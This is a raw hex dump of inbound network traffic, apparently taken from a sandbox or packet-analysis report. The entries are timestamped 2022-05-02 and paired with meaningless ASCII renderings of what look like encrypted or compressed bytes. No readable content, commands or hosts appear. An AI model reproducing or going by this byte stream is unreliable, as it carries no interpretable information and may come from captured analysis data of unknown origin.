96 a7 9b 46 0d b0 4f 91 fc 31 00 df df 7b 8e f8 41 c4 67 c4 8f 84 c9 4b 74 a2 6e 21 41 e3 0b 3e 85 a7 c3 86 5e 60 77 06 cd 19 f4 13 d7 04 b7 63 08 7b c0 37 49 1f d1 ef d8 98 ac ad
                                                                                  Data Ascii: gkf^\B7y#OTT71}NXW^N(5+(~y*QQ ysbS/l}vg,$XA6rlqF.=rM2y%YBdKAye0]FO1{AgKtn!A>^`wc{7I
                                                                                  2022-05-02 11:03:15 UTC2615INData Raw: 06 9e 6e 60 a4 af ca ae 78 89 96 94 5e 53 c8 18 10 50 03 c3 f0 30 6f 11 fb b9 3e 8d 5d d4 0b c0 0c ed 75 12 d0 63 a8 66 d0 8a 01 38 6d 36 4f 38 d9 28 c0 16 9c dd c7 0e b9 27 29 60 9a b1 27 e0 15 22 d2 11 68 b0 9c f7 99 48 22 1c 93 5f 84 f0 e6 a4 8e 82 d4 b7 db dc 88 9f 13 80 fd 15 39 e4 93 83 54 d8 8d c1 b7 31 ce 01 d9 97 fd 62 4b 08 7c c9 b7 f3 39 66 6d 91 28 14 ef c0 39 34 0d 6f ea 10 36 c5 4a 10 94 cd ba d4 f2 b8 59 b5 a7 c5 d5 24 28 80 7d 7b 54 f1 93 17 34 d5 c1 e5 23 c1 ce 97 71 ce ad a4 90 f1 93 0d 37 2f f1 e2 09 04 d0 71 7a 83 96 f4 54 61 1e 62 46 5c c8 4a cb e4 19 2e 8f 64 dc b6 b8 2a 19 1e 29 72 12 bc 85 bd 8e 32 4f 52 04 3c 14 4b e4 7d ef 49 64 bf f1 b8 7a 09 96 e3 dd ee aa fe a7 8e b4 6b 2d 98 16 b3 7a a0 79 00 f0 68 c8 8f de 21 2d d4 33 8f 99
                                                                                  Data Ascii: n`x^SP0o>]ucf8m6O8(')`'"hH"_9T1bK|9fm(94o6JY$(}{T4#q7/qzTabF\J.d*)r2OR<K}Idzk-zyh!-3
                                                                                  2022-05-02 11:03:15 UTC2619INData Raw: 09 47 00 f1 da 22 05 70 9b 47 74 55 07 b9 3d 4a cc 78 26 b1 d2 94 33 00 bf a0 9c 57 92 e0 45 a0 a9 bf 82 e0 cb 9b 5e 4c 4d ff dc 5f 1b aa 6b 57 cc 9d 7e 96 3d ba c6 30 e9 3b 45 18 5a 7c f2 ce b2 33 fd e5 87 5e be 4e a9 9e ae c8 d8 cb e7 68 28 f2 ed ae e5 ea 1d d8 87 16 00 2a 98 d4 d9 da 76 a3 30 95 5d d3 2f e2 90 5b fe 14 eb 5d 03 fe d5 d7 db 29 f3 b7 02 50 3e e4 63 a0 c4 eb dd 50 d3 86 48 5b 86 df 23 29 3c 42 de 25 15 ef 8d 35 b8 10 af ba 8c 84 60 5d a2 ba 38 4b 9d 46 90 c9 f1 2d ae 4e 61 0d ff b2 f4 63 70 04 00 22 3a 2b b9 79 69 35 99 b8 5d 2c 34 b0 ca ac df 33 99 f6 bf 7d 41 e3 84 d3 81 e8 92 bb 7c a0 1e 60 5c 47 70 ad f0 e6 e1 eb 0b 15 de 05 8d 8c fe d7 f5 4d 3d 93 64 ca 04 7d f3 7d a6 d9 26 53 f6 91 1b c3 5d b7 40 05 3d 0c 58 4a 35 ac 6b db 5d 71 1c
                                                                                  Data Ascii: G"pGtU=Jx&3WE^LM_kW~=0;EZ|3^Nh(*v0]/[])P>cPH[#)<B%5`]8KF-Nacp":+yi5],43}A|`\GpM=d}}&S]@=XJ5k]q
                                                                                  2022-05-02 11:03:15 UTC2623INData Raw: 35 13 b2 f2 db 4e 24 d3 39 d2 a1 52 19 56 43 34 aa eb 2f df f5 75 2d a6 9d e8 03 70 e0 f2 51 3f c3 44 0c 98 bc 46 8f b4 0a 0b 48 e8 ff 20 c4 85 41 ce b0 14 34 cb 09 73 11 2e 7e ac 3f aa d7 b4 53 9c 22 3f 31 00 29 51 f8 28 50 e9 ca f6 8b ab 4f fd dc 37 47 00 a9 68 55 08 8a bb d1 9f 84 7a 97 b8 e5 e9 82 8f 78 60 2d 2b 13 ec 4d cd 12 b6 4b 8f b3 cd e0 89 3d c9 5f b3 5e 0a 38 51 a6 00 09 90 b5 cc 19 49 07 35 21 f2 c2 e4 0c 45 ec cf af 33 c0 9c 62 c5 eb 71 f3 77 80 c1 10 c3 24 d0 3f fe 71 98 49 aa 77 71 35 5f a5 4a 6e 1c 01 f7 19 97 13 db d1 cf 4c 53 1c b4 3d 49 1c 5c 7c 1c 58 b2 7b cd 2a d9 cf 7b 16 ab 5d 83 71 d6 ea 33 3c 5d 42 c0 56 5c 00 ca 2b a7 a1 70 df 1d fa 97 a1 44 19 02 f9 06 62 d2 96 ae 1f 0f c9 e3 62 81 44 61 18 7b a9 ec be ff fa f6 27 9b 30 33 1b
                                                                                  Data Ascii: 5N$9RVC4/u-pQ?DFH A4s.~?S"?1)Q(PO7GhUzx`-+MK=_^8QI5!E3bqw$?qIwq5_JnLS=I\|X{*{]q3<]BV\+pDbbDa{'03
                                                                                  2022-05-02 11:03:15 UTC2628INData Raw: c7 71 a4 21 c7 f0 46 37 30 e2 89 62 e1 7e 16 b4 87 b6 d2 b7 96 f2 63 81 ba 2b 28 cb eb 52 c4 04 2e e0 17 f3 c6 91 6a 1a fd 67 5f 33 3a 85 aa 1c 9b cf d0 8f 23 b4 5c c6 a8 55 82 2f 62 64 78 1d 0f 5e eb 74 f8 7a bb d4 34 28 21 e5 21 3c 23 78 92 c2 a1 90 df 63 8d 5b dd 81 f5 db 33 9d 6a cc 24 09 95 9a 00 c4 ad 9f f0 39 3b 3e 24 0f 22 47 96 0f 44 7f 8d af 6a b5 c9 89 2a 4d 28 2f ae 22 2c 2f 10 08 8a 97 17 7e a4 61 bf 9e af 4f 4e 55 39 a8 31 e1 16 7e 36 a3 2a 28 54 50 e8 f4 a7 18 1e 44 97 6f 54 ae a3 73 30 a0 05 09 a7 0e 31 d7 66 8c 3d c6 a4 6a a5 9a 18 ec 7e aa 6e fb 22 90 b3 61 5a 34 59 45 40 13 5e 19 0c 6d 8e 5a c7 8f 56 a3 31 16 8d b8 2d 59 36 52 2b 70 6e e4 b6 1f ad e4 ff 8e df 9c f0 86 de 13 e1 34 05 25 1d 29 24 78 57 6c 4d dc ef 97 0f cb 0c 7d 29 4b 48
                                                                                  Data Ascii: q!F70b~c+(R.jg_3:#\U/bdx^tz4(!!<#xc[3j$9;>$"GDj*M(/",/~aONU91~6*(TPDoTs01f=j~n"aZ4YE@^mZV1-Y6R+pn4%)$xWlM})KH
                                                                                  2022-05-02 11:03:15 UTC2632INData Raw: cd f3 dc 28 af 23 ae 20 35 3e 1c 11 05 c4 63 1e 64 8b 8e aa bf 32 08 df 41 47 8f 8e 03 c3 d1 ee ac e0 e2 bf d2 df 74 7b 18 18 84 4b 82 47 68 25 54 91 e1 58 fc e3 e6 29 a8 8a dd 5a df 95 a3 50 f9 45 69 4c 66 96 7b ec ea 00 1a 05 93 61 b9 88 5d c6 05 ce 99 82 b7 83 29 86 8a 50 e2 89 bc b3 b0 59 81 1c ca 72 96 5c d3 c1 e8 b3 df e1 f9 98 c3 9e 6e 15 70 96 d3 ad f0 6c be d1 5a f3 56 6b 2c e4 d8 73 cc 23 90 56 b9 5d 7e 79 cc 64 bb 05 40 da f3 be 8e 67 34 74 e0 87 55 80 e0 c2 45 0b 73 d8 73 a8 6e 9e de 69 ee 47 4e 07 00 b8 d5 01 48 5d 66 a1 da 4e 6d 51 59 48 38 57 4a d5 6c 20 2e 13 96 5c 37 13 31 5b 50 27 2a 9c c6 a4 99 17 69 86 9f 07 7c b1 d1 91 a8 af a2 57 f8 e8 ee 5d 23 6e 45 c3 2a a8 77 50 14 f9 e4 d3 e3 9c ec ce 2f e7 ce 68 df 4e 48 ea 2a b3 eb c5 9c 00 88
                                                                                  Data Ascii: (# 5>cd2AGt{KGh%TX)ZPEiLf{a])PYr\nplZVk,s#V]~yd@g4tUEssniGNH]fNmQYH8WJl .\71[P'*i|W]#nE*wP/hNH*
                                                                                  2022-05-02 11:03:15 UTC2636INData Raw: 5b 59 5c 55 0e a9 62 06 59 77 98 33 1a 1d 02 58 25 cf cd 4c b3 d4 98 72 5f 0c c8 88 53 0f 9f 6c 5e 57 0f ad 4d 63 87 82 a4 82 44 9c 13 40 18 7d 19 d3 a1 a7 4f 63 2a d9 a9 8b 87 14 ad cf 1a 68 ed 6c 0b 6e 84 15 9e a1 62 19 f8 bb 8c 13 29 94 e3 2f 3a b7 17 24 94 d2 f2 b2 d0 1d d3 92 e3 6a bd a2 74 ab 4e d9 4f b8 85 af 6f 7f b6 86 ca a5 ba 8e 76 7e ed bc 99 7f fb de e9 dd ef f1 a7 33 95 e5 20 6d 0b 8e 8f 22 b9 0d a3 8a eb d5 a1 52 d2 83 0b e1 7d 5d 86 89 27 d9 eb b1 07 e3 1d bc fa 46 ca 51 52 8e d6 0e f0 ac ec cb ec 9f dd b1 96 72 d5 d1 aa 48 8b 7e 64 3f e4 27 ff 4f dd 6c 70 98 76 56 42 c4 3b 97 cb c6 4d ce 8c 84 dc 2d cb 57 e1 bc d4 2b 56 da 09 27 54 12 1a 04 12 5c 54 3c c5 4e 91 69 ef 2c 24 f1 25 bd 98 e3 f2 d9 fa 1e 78 ae c5 25 1c 03 81 e3 da c9 51 f2 ea
                                                                                  Data Ascii: [Y\UbYw3X%Lr_Sl^WMcD@}Oc*hlnb)/:$jtNOov~3 m"R}]'FQRrH~d?'OlpvVB;M-W+V'T\T<Ni,$%x%Q
                                                                                  2022-05-02 11:03:15 UTC2639INData Raw: 65 64 02 73 57 6e 65 14 f7 ac f1 d1 92 f5 c5 d8 88 a9 8b b3 5a 21 6f 34 3c ba 48 03 5d 9b 80 49 74 4e 1c 9a d4 fe c5 e0 15 a0 fe 57 8c 50 b6 aa 66 ec 9c 94 38 7e 10 49 91 3f 08 fc 9a b0 69 84 b7 7b 64 86 2b 3e 74 3b 3f 26 2f e0 fb 4d 82 16 fe 23 60 8a 5b 49 00 ce 5b c9 45 2a 76 d0 e5 cd 71 d1 91 da 9d ea c0 20 61 28 c6 60 cb 87 04 3a 37 15 2a 57 95 f2 8b ce c2 de 47 0a fa 8e 9a 96 b2 78 cb 7e 35 e6 a7 fc 01 ef 66 d8 d8 99 20 ea af 16 af 2a 14 de c9 21 ba 0a 35 84 d6 b2 41 84 66 16 4c d9 18 cd cd 00 f1 2b 4b d0 62 87 96 26 60 ea 6b 5e f4 a4 23 68 60 4f 82 8f a6 6b 52 ad f2 13 eb 13 43 a8 2b 9d e9 d6 07 ef 3e 34 b2 3d f9 1e 4f 46 75 ea 94 4f 9f c3 58 70 89 d5 72 c1 a1 03 d5 48 50 35 d8 7b c7 d7 5e 67 04 8d 74 79 dc 15 50 fc 36 0c 25 51 36 64 7e 25 b9 cc 04
                                                                                  Data Ascii: edsWneZ!o4<H]ItNWPf8~I?i{d+>t;?&/M#`[I[E*vq a(`:7*WGx~5f *!5AfL+Kb&`k^#h`OkRC+>4=OFuOXprHP5{^gtyP6%Q6d~%
                                                                                  2022-05-02 11:03:15 UTC2643INData Raw: 43 f3 fc 50 64 e5 a8 6c fc 65 e8 06 d8 b8 a7 e9 7f ca e2 b3 c8 5b c4 05 f3 7a 49 63 eb d8 0f 0d 78 57 63 8b 87 38 45 e7 66 ad 54 93 67 11 c8 69 8a 29 5e 88 bb aa f4 26 57 78 93 c7 a8 06 3b 84 c1 39 71 ab a4 bb 2f 4b 77 9c 27 53 6d 57 4a df e3 8f 16 0c d0 8a 63 af 50 d5 0e c7 58 06 e0 4a 6b 47 32 93 02 d9 6e fd e0 56 3a ff f1 70 92 5c 15 01 47 6f 03 f4 2b 4a 95 d4 c9 dd 73 07 18 ef a7 1e ea e5 01 7a fc 37 28 16 a1 49 d2 5f 73 f2 95 73 0a 8c 59 4e d1 e3 62 18 a9 02 17 68 d5 a6 53 3f 1e 7b 7c d2 4e 6b f3 70 00 2a 5b 44 04 ad 8d b9 8e 42 d9 bf a7 cc 3f 2f 3f f1 75 1f 89 8f dc 34 18 2e 64 47 17 12 5e 1d db 51 d3 fe a5 13 ed 4a a5 f4 17 6c c4 a9 ea 24 5b d2 a0 49 d0 4b 63 7b 68 86 8d 8d b2 a0 33 f5 9a 85 56 ac 16 3c 6a d3 28 d3 4f b9 7a 9d f9 ef eb fd f8 06 9b
                                                                                  Data Ascii: CPdle[zIcxWc8EfTgi)^&Wx;9q/Kw'SmWJcPXJkG2nV:p\Go+Jsz7(I_ssYNbhS?{|Nkp*[DB?/?u4.dG^QJl$[IKc{h3V<j(Oz
                                                                                  2022-05-02 11:03:15 UTC2647INData Raw: c9 26 45 ed 98 38 83 3b bb 56 f6 c4 2b 42 13 17 4a 26 1d 8c 1e f1 ee 0b 66 bf 51 ee be 65 19 0e 10 0b 63 34 6f 47 34 3a 73 e4 7c 08 7d bf 98 9d 19 2d 70 2e 2d d7 ea 2e 5a 2b f9 d6 c6 07 e2 3b a0 c6 29 e4 11 2d 63 76 eb 6c aa 9c 46 25 10 75 fa 7e d3 df 6c 30 cb a8 6b ae b1 83 8f 2c 90 cc 38 1f ea 1d d5 ef ba 70 b4 12 e1 51 95 4b 0c e5 11 35 b6 89 e4 d2 d6 b7 c5 bd 47 27 33 df 0c fd f5 6c b3 01 17 73 7c ad e2 d9 c7 d3 33 93 02 0b 4a 4b 0b be 10 85 c8 52 12 f5 16 51 b1 b5 27 ed 67 47 08 51 b4 ab 1e d1 7f e8 1c 0a 3c e0 25 61 67 ac 0f 51 65 e2 8b 0a 55 9e 63 9b 41 84 79 14 91 f2 2a c6 76 ef e8 ed 3d f6 7e 7b 9c 71 3c 3e 4c 20 9a bf 91 5c 0d 3f fc a6 d6 a3 cd d1 1b 29 60 3e 4a f6 8c 28 54 c0 3f b2 ed a2 1a 2f 32 09 5b d5 a1 e5 5e 11 38 80 fb 22 2a 74 bb 72 9a
                                                                                  Data Ascii: &E8;V+BJ&fQec4oG4:s|}-p.-.Z+;)-cvlF%u~l0k,8pQK5G'3ls|3JKRQ'gGQ<%agQeUcAy*v=~{q<>L \?)`>J(T?/2[^8"*tr
                                                                                  2022-05-02 11:03:15 UTC2651INData Raw: 2b 62 0a 89 22 8f 70 38 b4 73 4e 02 f7 09 6d 36 71 9d 9c 39 0d fd ce 19 0e fd e9 af b1 4d 69 64 99 85 48 9b b6 a9 b7 7d 5f 7f 1c cd b2 bb f1 59 29 be 9b 64 aa 63 bf af 51 a0 85 85 bc b0 04 98 e7 79 72 3d 15 8e 28 cd 1f f3 50 81 fc a9 59 07 d7 68 f3 f4 62 bb d8 b5 ac 26 dd f1 4e c8 cd 9e 8f 3d e4 d4 42 bd 33 66 86 ee 68 07 0a 0f 5a 82 c5 7e 03 b7 65 68 57 14 da 54 47 92 af f5 c0 9d 10 d4 b5 cd f8 60 36 ed 33 15 5a fb 06 cc 17 d1 14 4d c2 de eb a5 56 23 dd 1b 17 48 d3 b5 23 00 c8 bf 07 52 06 81 53 95 43 cb 93 69 00 e9 10 67 fb 3f 22 70 03 f0 46 c6 60 73 1b eb 35 e3 5d ce 86 17 2f 8d 8e 94 91 02 67 15 4a bf 1f 5d 6e 3e df 0d 6f d7 81 b9 47 ae b8 96 b3 3b 0e 5a a8 6b e6 30 b9 ee fa 4c 2e 9f a5 f9 ae 00 d5 16 a9 4c c0 74 0e c1 5b 09 a5 36 fb 32 36 66 46 bc 7c
                                                                                  Data Ascii: +b"p8sNm6q9MidH}_Y)dcQyr=(PYhb&N=B3fhZ~ehWTG`63ZMV#H#RSCig?"pF`s5]/gJ]n>oG;Zk0L.Lt[626fF|
                                                                                  2022-05-02 11:03:15 UTC2655INData Raw: 32 96 0b 86 3d c2 cf de 9a 39 f9 ce 45 06 00 ff f1 31 b7 97 3f 35 2b 00 f0 87 b0 ef 98 13 cb ff 52 40 c4 eb 1a d5 11 fa e8 cd 75 12 ea de 4c 80 5a 55 02 05 37 16 1a 2e 5d a0 18 05 a9 60 91 79 24 83 ac dd f0 cc 1e 34 61 14 38 1c 0e 29 19 b3 a7 d8 10 25 93 00 35 5d b1 29 9d f7 26 c3 d0 06 9c e6 ff 09 7d 96 57 f3 c6 ba df 85 cf 01 01 2b 35 ef c1 aa 83 1a e4 7f e9 51 50 bb 39 36 a7 e5 59 75 7e dd 96 7e d6 4d 28 25 2b 5d ea a9 0e cd 2c 4d cc cc cc 04 d9 c9 0e a5 aa 07 f0 25 fd b7 b6 c6 0d f2 1a 63 54 8d 6e 23 a7 e3 ef fa 94 b9 58 11 8b f1 a5 ab 18 0e 15 0c c7 ec 74 68 73 c2 16 28 d7 64 e3 c3 50 e1 85 0e 3a 24 25 c6 7f b1 1b 34 00 bd 15 c0 b1 93 13 9d 80 7e a5 68 5c 35 82 91 fb e0 40 dc 6c 86 4f cf 43 7e df 55 1b 49 a0 9d 27 14 ef 93 07 a1 5d b7 33 70 ff ef dc
                                                                                  Data Ascii: 2=9E1?5+R@uLZU7.]`y$4a8)%5])&}W+5QP96Yu~~M(%+],M%cTn#Xths(dP:$%4~h\5@lOC~UI']3p
                                                                                  2022-05-02 11:03:15 UTC2660INData Raw: 06 41 71 d5 f1 09 ef 1b 9a f9 cb 36 e5 f2 a6 11 af ef 42 8d 4c b5 d9 f1 7b 26 3d 8c 56 d5 eb e0 c5 65 13 ba b9 e4 60 f4 d4 91 ad b2 03 bf 9a 44 f6 27 b7 e1 7f 2e 03 99 36 97 b6 e4 38 80 2e 83 8e 75 fc e6 03 90 63 c6 81 8e 55 f2 b2 b8 78 55 9d b2 a7 fd 16 fc ec a4 a7 5b da 78 f8 8c 10 3b 91 9b 91 44 5c ed 53 83 d1 da 73 8f 72 45 70 99 b1 bf f2 91 08 1c 09 66 76 df 25 9d ca 75 1e 43 3a 13 b1 74 17 66 d3 88 77 9a e8 f8 e1 82 63 f6 30 8a 19 c3 8c a6 31 d1 96 a2 fe a7 f8 10 9f 08 61 ea 73 c7 90 a0 ce 02 a5 e2 38 5a 19 05 8c ac f1 78 d6 8c 5c 6e 37 6e 87 a9 5f 2d c0 ad 1a ea db b1 5e cb ee 2b 83 59 d8 d4 be 76 88 53 b7 89 5e 3f 29 d9 5a 28 bb 8a 50 b2 cc 14 ee 6d 7b 8f 03 68 dd 31 08 1d 5b 70 72 b4 b6 64 fe 6a ad 4c f5 53 e1 54 10 d4 d5 53 b4 4a 88 d5 2c 27 30
                                                                                  Data Ascii: Aq6BL{&=Ve`D'.68.ucUxU[x;D\SsrEpfv%uC:tfwc01as8Zx\n7n_-^+YvS^?)Z(Pm{h1[prdjLSTSJ,'0
                                                                                  2022-05-02 11:03:15 UTC2671INData Raw: c6 0e 6e df 61 b1 67 fa bd 66 a5 26 c3 dc dc f3 81 18 1d 12 49 0d 54 de 2f c0 34 b1 99 94 19 ab 42 ea 95 48 91 9d 23 3c bb df d1 83 6a 27 56 71 c2 81 76 44 bd d3 1b ec 44 d4 f1 be bb 85 5b 68 3e a4 01 41 75 a9 7b a1 4f 25 9f 6c 04 54 3b 98 ce 2b a3 83 7d c8 2a 01 bf 6a bd bf b9 00 80 05 7d 39 aa 32 46 db ad 81 e7 78 3d 6c 99 9c 8e 85 b8 28 bd 4b a8 9c f6 42 e4 3f 09 b2 77 56 71 2f a8 7e bc ec fd a9 27 2d d0 f2 1e 09 b1 06 45 e3 cf 3b 62 41 98 5f a7 0e d4 75 06 cf 88 9a 6b f7 9e 2d 43 c7 37 50 63 18 dc ec 96 2d c4 90 04 3f ef d7 c9 ff 58 8e f9 54 c7 70 fe a5 ea 12 e0 d7 5c 56 c3 71 ce a2 bc f6 e1 1e 23 49 a2 99 a5 60 5e eb 36 31 15 2a 37 8b fd a9 67 31 16 66 e2 7c dd f1 43 ac b3 e8 4f 75 70 24 73 19 67 3b 5c 82 4d 2d c3 c7 a3 15 4c e3 04 df 95 9c 39 a9 a1
                                                                                  Data Ascii: nagf&IT/4BH#<j'VqvDD[h>Au{O%lT;+}*j}92Fx=l(KB?wVq/~'-E;bA_uk-C7Pc-?XTp\Vq#I`^61*7g1f|COup$sg;\M-L9
                                                                                  2022-05-02 11:03:15 UTC2687INData Raw: e5 1d 0a e9 5d 61 fc 3b 65 b4 ea 57 66 7b 81 63 bf f6 ee e1 37 2f 18 f9 0c 45 54 70 13 fe fd b6 76 6a b7 3e 58 66 dc 47 38 4e de b4 f9 38 10 6d 99 df cf 21 cd dc 9e f9 d2 98 ff 25 e2 97 d5 96 88 a6 77 7e 35 c6 39 dd 03 64 f7 19 24 68 d4 93 1a 8d bc 49 da a1 17 50 ff 3e 1d 13 3c 4b 85 fc 70 b4 c9 11 ef d6 52 e4 cf 5f 3e 33 b4 0e e3 d4 06 3d 53 05 5f b3 a2 af 9a 1b 4d 6f 9f 38 b9 db 32 3a 1a ca 2a 0a c2 78 e7 1e 5b 75 c5 41 ff 72 8c 68 de 2b dd 71 d0 09 5c 21 df 33 b9 7d 27 3d ea 7a 23 e0 c2 58 72 ee ab 7b 75 2c f5 8b 4f 78 e7 62 bb 3b d5 59 41 b8 68 13 45 cd 2a 48 a5 1e 40 a8 66 68 40 14 6d b1 e6 6b f8 f1 72 b2 9f c3 e8 43 be d4 9e 25 20 dc 66 38 07 dc 5b 23 06 19 db d8 52 de ba 85 35 cd 06 3b 9d a0 1d 46 76 15 16 55 a2 13 29 b1 5c 5b 8f 2c c3 38 27 15 47
                                                                                  Data Ascii: ]a;eWf{c7/ETpvj>XfG8N8m!%w~59d$hIP><KpR_>3=S_Mo82:*x[uArh+q\!3}'=z#Xr{u,Oxb;YAhE*H@fh@mkrC% f8[#R5;FvU)\[,8'G
                                                                                  2022-05-02 11:03:15 UTC2703INData Raw: 6c 4b 37 67 07 71 40 01 d2 49 ea cc f0 dc fc c0 ef 11 eb 19 02 f3 53 b7 c7 03 85 94 a9 fa 8f 06 38 e3 e6 e8 0e 28 6e 2b 15 43 79 07 b2 4f f2 3c 64 88 ce 85 f3 c8 79 d5 9c e3 9b 26 e1 f1 ee c9 40 cb 60 52 2e f4 0b c1 3b 00 fd 9f 2c 73 9b b8 b4 4f 02 41 b2 39 0c d3 26 d6 43 ee 9f 2b 04 52 2e b2 18 de e2 36 58 fe 3e 6d 7d 3e 92 e4 a2 28 43 2e 7c 13 8c a5 4a a1 da 0c 0b 23 f9 eb 08 98 b8 c2 5c eb 27 57 84 a0 f1 b8 df 1f e3 57 aa 86 63 4a c3 2a e5 f0 d3 8c 37 e9 4f f7 f9 d0 1f 97 df e3 1d e1 71 d4 3c 47 8b b3 94 34 eb ff f9 89 3c de ed 05 c8 13 b2 68 4c 60 16 73 15 60 ba 98 11 72 84 13 1e 7a a2 18 88 6d f8 8b 2b a3 b2 c7 f6 c8 a6 03 46 84 1a 00 f0 45 f5 2d 94 e1 fc 2a 94 11 f4 89 35 57 22 34 0e 9f 0f 1f 5b bf 82 0a 77 27 c9 38 39 a5 7a 51 22 67 64 11 b0 74 72
                                                                                  Data Ascii: lK7gq@IS8(n+CyO<dy&@`R.;,sOA9&C+R.6X>m}>(C.|J#\'WWcJ*7Oq<G4<hL`s`rzm+FE-*5W"4[w'89zQ"gdtr
                                                                                  2022-05-02 11:03:15 UTC2719INData Raw: 6c da ee 0a 7d ac 3e 59 3c 11 f0 04 8f bc 43 f9 89 21 75 a0 83 73 ed 09 4d dd 2a 44 5c 4c 60 d4 4e e2 2e 4e ea 9a 6e 3c cd cc 94 90 f0 90 e4 de 9e 87 68 8d 00 dc 20 e4 b7 b4 63 3b b0 86 55 d7 25 fc 27 aa 1a 2b 77 28 cf 05 9d 85 08 a0 41 dc bb b3 5f 68 b8 08 f0 18 80 6e be 2e 4a 60 36 2f fc a4 b5 e6 b3 72 f6 c2 56 7f 50 d5 92 0c 73 f8 5d 9f 98 c5 13 95 bc db 03 03 e7 31 f0 47 79 ab 70 9a f2 21 82 36 02 89 a7 54 65 99 9b da fe ca 54 6a 37 e2 ac 94 52 98 27 b4 22 c5 47 15 f6 e0 27 82 63 f0 31 17 c2 97 56 f2 e7 c8 bf 19 f5 85 75 99 d2 47 f3 e3 87 53 e7 94 f4 f8 3d 00 86 1f 09 ae 5b 08 eb ca 0d 0b 1c e0 8b 8d 0f 41 24 45 e7 f7 83 12 b0 3e d6 42 82 a1 a9 3d d8 fa 97 0c d5 3e 0f 14 9b 37 7f 6c 0b 2b ab 32 62 b5 66 f5 85 55 2f 19 cd 9d 67 0f ea 48 bb 19 7e d6 53
                                                                                  Data Ascii: l}>Y<C!usM*D\L`N.Nn<h c;U%'+w(A_hn.J`6/rVPs]1Gyp!6TeTj7R'"G'c1VuGS=[A$E>B=>7l+2bfU/gH~S
                                                                                  2022-05-02 11:03:15 UTC2735INData Raw: 46 c1 94 53 d2 17 3c 31 32 1a 37 3d 0e c1 28 73 9d 0e 81 84 b7 1a fb d9 48 e9 d0 01 ac 35 e7 16 59 65 78 a6 74 fa ac 2d 36 51 06 75 b9 6a 21 7a ea 30 25 da cc 17 3d 75 6f 3b 0a e9 da 3c 80 d8 82 da 6c 9e 3a 91 87 83 a7 ed 07 dc f5 55 36 16 92 c6 72 6b 66 06 88 ce f6 2b 09 2d aa 27 1e 8b 36 b2 0e dd 27 c0 ba 0e 34 1f 80 f6 4a 10 9a df 2e b3 30 ff 35 82 49 0d de d8 9d ac 64 1a 02 95 32 11 77 58 7b fc af dd 06 12 3c ab 40 5c 18 59 a1 c1 cd dc b9 ca c0 26 5a c9 db 33 ac 20 f7 be 9a 59 cf 6f 5d 01 09 71 d2 a9 99 74 43 46 31 37 d5 5f f0 e1 b0 89 2f d0 8f 2f 04 e4 d7 de c2 28 66 4a c8 96 66 4c 2c bf 59 fe 87 aa a1 e4 67 5e 15 8e 71 9c bc e7 6c e0 76 48 d7 27 a0 f9 79 b6 18 68 d2 80 9b e5 7c 70 86 12 56 b0 3e c5 3d 24 13 f7 28 3f fd d4 d2 c5 d4 83 cd 3f 1e b3 6a
                                                                                  Data Ascii: FS<127=(sH5Yext-6Quj!z0%=uo;<l:U6rkf+-'6'4J.05Id2wX{<@\Y&Z3 Yo]qtCF17_//(fJfL,Yg^qlvH'yh|pV>=$(??j
                                                                                  2022-05-02 11:03:15 UTC2751INData Raw: 03 17 ca 28 27 f4 ca 63 eb a6 48 d7 7c 9e d0 76 fa c0 ec 4d 12 cf f5 9b 06 3c dd 0c b3 5b 08 09 7e a2 64 1c 98 81 99 d6 10 ac 85 95 9c d9 dd fa e4 71 e4 4b e0 06 1d 63 41 44 21 8c 41 bf 25 ec 51 cb 25 a3 fa 8e 65 98 0a 7a 80 2f a2 e5 77 88 8d ff 24 c5 28 8f a0 f3 63 62 2b 85 74 0e dc a8 ff b9 1d 0a 5e 82 b2 4c 1b 98 a8 a6 a7 6b 25 04 1c 07 46 c1 50 99 6a ec 95 be 37 ef 48 5c 5a 3d f9 39 29 ff 9b 42 91 72 f3 0a e7 bd eb 05 b1 98 35 5a 09 ba 81 90 28 8b d7 c8 de c7 f2 d8 fc 0a 1c 51 67 e1 e1 15 e3 82 b8 70 40 76 7d 95 fa 57 9f 3a b7 eb 89 6a 8e de 3f 67 fe fe 6a ba d2 05 05 86 f8 2c 43 9d 71 15 18 0d 11 1b 78 e8 6b 2e f5 29 98 5e 25 e7 83 f2 e1 1e ab a8 f8 e7 2c 83 2b 9b e1 4a 39 f4 ee 2f 22 94 a8 99 2f e1 90 94 e4 96 63 d0 85 6d a9 aa a0 15 ec e0 2c f0 cd
                                                                                  Data Ascii: ('cH|vM<[~dqKcAD!A%Q%ez/w$(cb+t^Lk%FPj7H\Z=9)Br5Z(Qgp@v}W:j?gj,Cqxk.)^%,+J9/"/cm,
                                                                                  2022-05-02 11:03:15 UTC2767INData Raw: 02 02 10 e8 84 12 45 83 12 bc 85 12 01 07 00 13 02 02 02 10 e8 84 12 45 83 12 bc 85 12 01 06 20 10 18 90 12 06 04 14 90 12 1c bd 80 12 02 00 09 14 90 12 06 04 10 90 12 bd 80 12 b9 80 12 02 00 0b bd 80 12 b9 80 12 01 20 08 10 90 12 06 04 0c 90 12 bd 80 12 1d bd 80 12 1c 01 04 00 0e bd 80 12 1d bd 80 12 1c 01 03 20 0b 0c 90 12 06 04 08 90 12 08 1c 08 03 00 08 08 1c 08 02 20 05 08 90 12 06 04 04 90 12 b8 83 11 08 6c 84 12 1c 01 05 00 0e b8 83 11 08 6c 84 12 1c 01 04 20 0b 04 90 12 06 04 00 90 12 b8 83 11 bd 80 12 08 68 84 12 1c 1c 06 00 11 b8 83 11 bd 80 12 08 68 84 12 1c 1c 05 20 0e 00 90 12 06 04 fc 8f 12 1c 02 02 00 07 fc 8f 12 06 04 f8 8f 12 02 dc 85 11 1c 01 04 00 0b f8 8f 12 06 04 f4 8f 12 f4 85 12 bd 80 12 1c 01 04 00 0d f4 8f 12 06 04 f0 8f 12 1c 02
                                                                                  Data Ascii: EE ll hh
                                                                                  2022-05-02 11:03:15 UTC2783INData Raw: 11 15 01 20 84 12 15 0b 1c 00 1e 05 01 29 84 11 15 00 1e 03 01 30 0e 65 81 12 01 20 84 12 15 08 1c 00 1e 65 81 12 00 1e 03 01 30 0b 70 84 12 70 84 12 02 07 08 1c 70 84 12 01 00 06 08 bd 80 12 0e 08 bd 80 12 bd 80 12 06 07 0e 3d 81 12 bc 85 12 0e bd 80 12 03 00 0c 3d 81 12 0e bd 80 12 02 20 09 bd 80 12 89 83 12 01 20 08 b8 85 12 01 0a 05 b8 85 12 b8 85 12 b8 85 12 03 07 0b b8 85 12 01 01 20 06 bd 80 12 08 08 0c 84 11 bd 80 12 05 07 0d 02 02 02 bd 80 12 02 04 20 09 0e bd 80 12 01 00 06 0e bc 85 12 bd 80 12 02 00 09 b4 85 12 b8 85 12 02 07 08 bd 80 12 bc 85 12 0e 